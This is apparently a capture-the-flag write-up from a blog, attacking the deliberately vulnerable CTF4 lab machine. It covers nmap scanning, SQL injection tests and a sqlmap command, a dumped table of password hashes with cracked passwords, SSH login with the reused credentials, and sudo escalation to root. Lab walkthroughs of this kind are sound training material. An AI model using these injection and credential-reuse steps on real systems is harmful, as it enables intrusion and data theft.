Saturday 12 March 2016

CTF4

Hello!
Looking for our target
root@osboxes:~# nmap -sn 192.168.1.0/24

[CUT]
Nmap scan report for 192.168.1.103
Host is up (0.00075s latency).
MAC Address: 00:0C:29:28:D9:61 (VMware)
What kind of services are running on our target machine?
root@osboxes:~# nmap -sV -p- 192.168.1.103

Starting Nmap 6.47 ( http://nmap.org ) at 2016-03-12 12:34 GMT
Nmap scan report for 192.168.1.103
Host is up (0.00052s latency).
Not shown: 65531 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
631/tcp closed ipp
Hmm, Sendmail and Apache look interesting. Let's examine the web page.




















Default content... Let's continue our exploration




















Nice! We found LFI vulnerability on page parameter. In the blog section we are able to retrieve usernames such as jdurbin, sorzek.
http://192.168.1.103/index.html?page=blog&title=Blog&id=7
Look at id parameter and let's examine SQLi with AND 1=1 -- - and AND 1=0 -- -. It works!
I have run sqlmap and I have got following result:
root@osboxes:~# sqlmap -u "http://192.168.1.103/index.html?page=blog&title=Blog&id=7" -p id --level 5 --risk 3 --dbs
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test
Let's examine ehks db.
Database: ehks
[3 tables]
+---------+
| user    |
| blog    |
| comment |
+---------+
Nice! Maybe something interesting will be in user table.
Database: ehks
Table: user
[6 entries]
+---------+-------------+-------------------------------------------------------------+
| user_id | user_name | user_pass                                                                 |
+---------+-------------+-------------------------------------------------------------+
| 1       | dstevens    | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)       |
| 2       | achen         | b46265f1e7faa3beab09db5c28739380 (seventysixers)|
| 3       | pmoore      | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin       | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)      |
| 5       | sorzek        | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)         |
| 6       | ghighland  | 9f3eb3087298ff21843cc4e013cf355f (undone1)         |
+------+-------------+-----------------------------------------------------------------+
Excellent!
Dirbuster found also /admin panel and I know that probably we will be able to log into the administration panel using one (or more) of the credrntials as above. But my idea is to try log into the server via ssh using these credentials. We remember that we saw jdurbin and sorzek usernames before. Maybe this is a hint that these usernames are different than other. So let's try












Good.
[jdurbin@ctf4 ~]$ cat .bash_history
ln -s /var/www/html html
exit
mkdir inc
ls
exit
cd /var/www/html
ls -lah
chmod g+w pages
ls
ls -lah
mysql -u root
mysql -u root
mysql -u root -p
mkdir sql
mysql -u root -p
mkdir conf
exit
cd /var/www/html
ls -lah
chgrp users *
ls
ls -lah
chgrp -R users *
cat banner.txt
exit
cd /var/www/html
ls
mkdir admin
ls -lah
mkdir images
exit
cd /var/www/html/admin
mkdir inc
mysql -u root -p
exit
cd /var/www/html
mkdir mail
cd mail
wget http://superb-east.dl.sourceforge.net/sourceforge/roundcubemail/roundcubemail-0.2-beta2.tar.gz
ls
tar -xvzf roundcubemail-0.2-beta2.tar.gz
mv roundcubemail-0.2-beta2/* .
mv roundcubemail-0.2-beta2/.* .
rmdir roundcubemail-0.2-beta2
ls
rm *.tar.gz
ls -lah
less INSTALL
mysql -u root -pdatabase
mysql roundcubemail < SQL/mysql.initial.sql
mysql -u roundcube -ppassword roundcubemail < SQL/mysql.initial.sql
less INSTALL
chmod o+w temp
chmod o+w logs
less INSTALL
exit
cd /var/www/html
ls
ls -lah
cd mail
ls -lah
exit
cd /var/www/html/mail
ls
ls -lah
rm squirrelmail-1.4.17.tar.gz
perl config/conf.pl
less INSTALL
mkdir /var/local/squirrelmail
less INSTALL
ls
exit
cd /var/www/html/mail
ls
cd data
ls
cd ../plugins/
ls
exit
ls
cd /var/www/html
ls
mkdir restricted
cd restricted
vi .htaccess
htpasswd -c sorzek
htpasswd -c .htpasswd sorzek
htpasswd .htpasswd ghighland
cat .htpasswd
htpasswd .htpasswd pmoore
htpasswd .htpasswd jdurbin
vi instructions.txt
mv instructions.txt blog_instructions.txt
vi email_instructions.txt
ls
cd html
ls
cd restricted/
ls
vi webmail_instructions.txt
su
ls
cd ..
ls
mv index.php index.html
vi /etc/php.ini
pwd
cd /var/www/html
vi .htaccess
su
logout
and I found also
[jdurbin@ctf4 conf]$ cat config.ini
dbhost    =    localhost
db        =    ehks
dbuser    =    root
dbpass    =    database
and in our mails I found
[jdurbin@ctf4 mail]$ cat INBOX.Sent
From jdurbin@ctf4.sas.upenn.edu  Mon Mar 09 10:46:56 2009
Received: from 192.168.0.50
        (SquirrelMail authenticated user jdurbin)
        by 192.168.0.6 with HTTP;
        Mon, 9 Mar 2009 10:46:56 -0400 (EDT)
Message-ID: <e7075b8be1b7db3648d2acce17f21087.squirrel@192.168.0.6>
Date: Mon, 9 Mar 2009 10:46:56 -0400 (EDT)
Subject: Server setup
From: "James Durbin" <jdurbin@localhost>
To: "Don Stevens" <dstevens@localhost>
Reply-To: jdurbin@localhost
User-Agent: SquirrelMail/1.4.17
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Status: R
X-Keywords:                                                                      
Content-Length: 290

Hey Don,

  I think I got the server pretty much set up.  I just have to make some
more adjustments.  Unfortunately I couldn't get RoundCube installed
because our version of PHP is too low.  I'll send more updates as I make
them.

--
James Durbin
Webmaster
Prof. Ehks Data Research Center
Maybe in dstevens mails we awill be able to find sth interesting? Unfortunately not :-( But!
[dstevens@ctf4 ~]$ sudo -l
Password:
User dstevens may run the following commands on this host:
    (ALL) ALL
so,



Game over!